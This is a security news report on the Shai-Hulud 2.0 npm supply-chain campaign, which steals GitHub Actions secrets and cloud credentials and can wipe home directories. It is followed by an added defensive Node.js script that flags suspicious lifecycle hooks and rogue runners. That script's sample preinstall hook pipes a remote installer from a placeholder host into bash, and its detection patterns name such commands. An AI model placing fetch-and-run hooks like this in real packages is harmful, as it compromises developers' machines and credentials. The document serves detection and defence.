New Shai-Hulud supply chain campaign exposes over 27K GitHub repositories

More than 27,000 npm repositories on GitHub, including widely used packages from ENS Domains, PostHog, Zapier, and Postman, have been impacted by the second wave of Shai-Hulud malware attacks, reports The Hacker News.

Intrusions involved the addition of a new preinstall script to the package.json file, which covertly installed or located the Bun runtime and executed a malicious script before registering the compromised machine as a self-hosted runner named "SHA1HULUD" and pilfering all GitHub Actions secrets, according to a Wiz report.

Another analysis, from Helixguard, noted that SHA1HULUD then executes TruffleHog to harvest npm tokens; Azure, Google Cloud, and AWS credentials; and environment variables. Koi Security and Palo Alto Networks Unit 42 researchers regarded the campaign as significantly more aggressive than the initial Shai-Hulud attacks in September.

"If Shai-Hulud 2.0 fails to exfiltrate credentials, it executes a fail-safe that attempts to irrevocably destroy the victim's entire home directory, escalating the attack from simple espionage into a guaranteed, highly disruptive denial-of-service event," said Unit 42's Justin Moore.
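As an added example, not code from the article or from any of the vendors it cites, the following Node.js script checks for the two footholds described above from the defender's side: lifecycle hooks in package.json that fetch or run a second stage (such as one that installs or locates Bun), and a self-hosted runner inventory containing a runner named "SHA1HULUD". The indicator patterns, the package names and the runner listing are this example's own constructed inputs and assumptions; the runner JSON only follows the shape of GitHub's GET /orgs/{org}/actions/runners response.

```javascript
// Added example (not from the article or any vendor report): audit the two
// footholds the reporting describes, from a defender's side.
//   1. npm lifecycle hooks in package.json (preinstall etc.) that fetch or run
//      a second stage, e.g. one that installs or locates the Bun runtime.
//   2. A GitHub Actions self-hosted runner inventory containing a runner
//      named "SHA1HULUD".
// All sample inputs are constructed for this example; nothing touches the network.

const LIFECYCLE_HOOKS = [
  "preinstall", "install", "postinstall",
  "prepare", "preuninstall", "postuninstall",
];

// Heuristic indicators for a lifecycle script. The names and patterns are this
// example's own assumptions, not rules from Wiz, Helixguard, Koi or Unit 42.
const SCRIPT_INDICATORS = [
  { name: "references-bun-runtime", re: /\bbun\b/i },
  { name: "remote-install-piped-to-shell", re: /\b(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b/i },
  { name: "inline-node-eval", re: /\bnode\s+(-e|--eval)\b/ },
  { name: "base64-decode", re: /\bbase64\s+(-d|--decode)\b/ },
];

// Returns one finding per lifecycle hook present in package.json, marking the
// hook suspicious when any indicator matches its command line.
function auditLifecycleScripts(packageJsonText) {
  const pkg = JSON.parse(packageJsonText);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== "string") continue;
    const indicators = SCRIPT_INDICATORS
      .filter((ind) => ind.re.test(command))
      .map((ind) => ind.name);
    findings.push({
      package: pkg.name,
      hook,
      command,
      indicators,
      suspicious: indicators.length > 0,
    });
  }
  return findings;
}

// Takes the JSON body of GET /orgs/{org}/actions/runners (or the repo-level
// equivalent) and returns the runners whose name matches the pattern.
function flagSuspiciousRunners(runnersJsonText, namePattern = /SHA1HULUD/i) {
  const body = JSON.parse(runnersJsonText);
  return (body.runners || [])
    .filter((runner) => namePattern.test(runner.name))
    .map(({ id, name, os, status }) => ({ id, name, os, status }));
}

// Constructed sample: a package whose preinstall hook pulls a remote installer
// and then runs a script under bun. The URL is a placeholder, not a real IoC.
const SAMPLE_SUSPICIOUS_PACKAGE_JSON = JSON.stringify({
  name: "example-widget",
  version: "1.2.3",
  scripts: {
    preinstall: "curl -fsSL https://example.invalid/install.sh | bash && bun run ./setup.js",
    test: "jest",
  },
});

// Constructed sample: a package with an ordinary postinstall hook.
const SAMPLE_BENIGN_PACKAGE_JSON = JSON.stringify({
  name: "example-lib",
  version: "0.4.0",
  scripts: { postinstall: "node ./scripts/patch-types.js", test: "jest" },
});

// Constructed sample in the shape of the GitHub runners API response.
const SAMPLE_RUNNERS_JSON = JSON.stringify({
  total_count: 2,
  runners: [
    { id: 101, name: "build-box-01", os: "Linux", status: "online", busy: false, labels: [] },
    { id: 102, name: "SHA1HULUD", os: "Linux", status: "online", busy: false, labels: [] },
  ],
});

// Demo run on the constructed samples.
console.log(auditLifecycleScripts(SAMPLE_SUSPICIOUS_PACKAGE_JSON));
console.log(auditLifecycleScripts(SAMPLE_BENIGN_PACKAGE_JSON));
console.log(flagSuspiciousRunners(SAMPLE_RUNNERS_JSON));
```

Point auditLifecycleScripts at every package.json in a checkout and under node_modules (a lockfile-driven install runs the hooks of transitive dependencies too), and feed flagSuspiciousRunners the output of `gh api /orgs/ORG/actions/runners`. A match is a reason to review that hook or runner, not proof of compromise. Installing with `npm install --ignore-scripts` keeps lifecycle hooks from executing during install, which is the simplest containment while a flagged package is being reviewed.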
